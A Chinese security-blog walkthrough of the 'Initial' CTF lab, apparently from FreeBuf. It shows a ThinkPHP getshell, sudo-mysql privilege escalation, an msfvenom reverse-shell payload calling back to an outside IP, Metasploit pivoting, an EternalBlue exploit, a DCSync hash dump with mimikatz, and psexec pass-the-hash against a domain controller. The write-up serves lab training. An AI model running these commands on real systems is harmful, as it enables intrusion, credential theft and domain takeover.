春秋云境 Initial
文章描述了一次渗透测试过程:通过扫描和漏洞利用获取初始权限并提权获得第一部分Flag;随后内网扫描发现存活主机并利用永恒之蓝漏洞攻击获取第二部分Flag;最后通过域控攻击抓取管理员Hash并反弹Shell获得完整Flag。 2025-7-2 04:57:25 Author: www.freebuf.com(查看原文) 阅读量:14 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Initial

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

  • IP地址:39.99.131.46

Flag第一部分

  • 先使用nmap对IP地址进行扫描:nmap -sV -Pn 39.99.131.46
    image

  • 开启了80端口,从浏览器访问IP地址
    image

  • 先使用BurpSuite对用户名密码进行爆破,发现都显示页面404,无法登录。
    image
    image

  • 通过页面图标判断是ThinkPHP架构,使用ThinkPHP工具进行验证,发现存在漏洞,使用工具进行GetShell。
    image

  • 使用蚁剑添加shell
    image

  • 使用文件管理功能查看root目录,发现权限不够
    image

  • 使用命令行查看当前用户和权限
    image

  • 尝试sudo提权,使用sudo -l查看,发现mysql命令不需要密码
    image

  • 查询使用方法
    image

  • 构造命令:sudo mysql -e ‘! find / -name *flag’ 来查看flag文件
    image

  • 构造命令:sudo mysql -e ‘! ls /root/flag’ 查看文件夹
    image

  • 构造命令:sudo mysql -e ‘! cat /root/flag/flag01.txt’ 来查看文件flag01.txt,找到第一部分flag:
    flag{60b53231-
    image

Flag第二部分

  • 上传fscan到目标主机
    image

  • 在命令行查看网络信息,发现内网IP地址:172.22.1.15/16
    image

  • 使用chmod 777 fscan_amd添加执行权限,使用./fscan_amd64 -h 172.22.1.0/24进行扫描,发现三个存活主机:172.22.1.2,172.22.1.18,172.22.1.21,对三个网址进行扫描
    imageimage
    image

  • 获取信息:
    172.22.1.2:172.22.1.2 (Windows Server 2016 Datacenter 14393)
    172.22.1.18:WebTitle: http://172.22.1.18?m=logincode:200 len:4012   title:信呼协同办公系统
    172.22.1.21:172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)

  • 使用msf工具,msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=120.27.227.99 LPORT=3333 -f elf**>**15.elf创建木马,通过蚁剑上传木马
    imageimage

  • 启动msfconsole,创建监听器,并上线39.99.131.46主机

    use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LPORT 3333
set LHOST 120.27.227.99
exploit

    imageimage
    image

  • 添加路由

    run autoroute -p
run get_local_subnets
run post/multi/manage/autoroute
run autoroute -p

    image

  • 创建代理

    use auxiliary/server/socks_proxy
set srvport 2222
run

    image

  • 使用Proxifier连接代理访问172.22.1.0/24网段
    imageimage

  • 网上搜索OA的exp文件,对其进行攻击,并添加到蚁剑中
    image
    imageimage

  • 使用命令行查看当前用户权限
    image

  • 搜索文件系统,在C:/Users/Administrator/flag/flag02.txt发现flag文件,找到第二部分flag:2ce3-4813-87d4-
    image

Flag第三部分

  • 接下来对172.22.1.21主机进行攻击

  • 之前扫描时提示存在ms17-010永恒之蓝漏洞,先验证是否存在漏洞

  • 使用MSF上的MS17-010扫描模块进行扫描,验证存在永恒之蓝漏洞
    image

  • 使用永恒之蓝模块进行攻击,获取172.22.1.21主机shell

    use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

  • DCSyncmimikatz2015年添加的一个功能,利用的这个原理,通过Directory
    Replication Service**(DRS) 服务的** GetNCChanges 接口模仿一个域控制器向另
    一个域控制器发起数据同步请求,能够用来导出域内所有用户的    hash**。**

  • 加载kiwi模块,抓取hash

    load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

    image

  • 发现Administrator用户的Hash:10cf89a850fb1cdbe6bb432b859164c8

  • 攻击域控主机172.22.1.2

  • 使用impacket工具中的psexec.py反弹shell,成功获取域控主机shell

    python3 psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG/[email protected]

    image

  • 浏览文件,在User\Administrator\flag文件夹下找到flag03.txt文件,查看flag03.txt文件,找到第三部分flag:e8f88d0d43d6}
    image

完整的Flag

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/endpoint/437444.html
如有侵权请联系:admin#unsafe.sh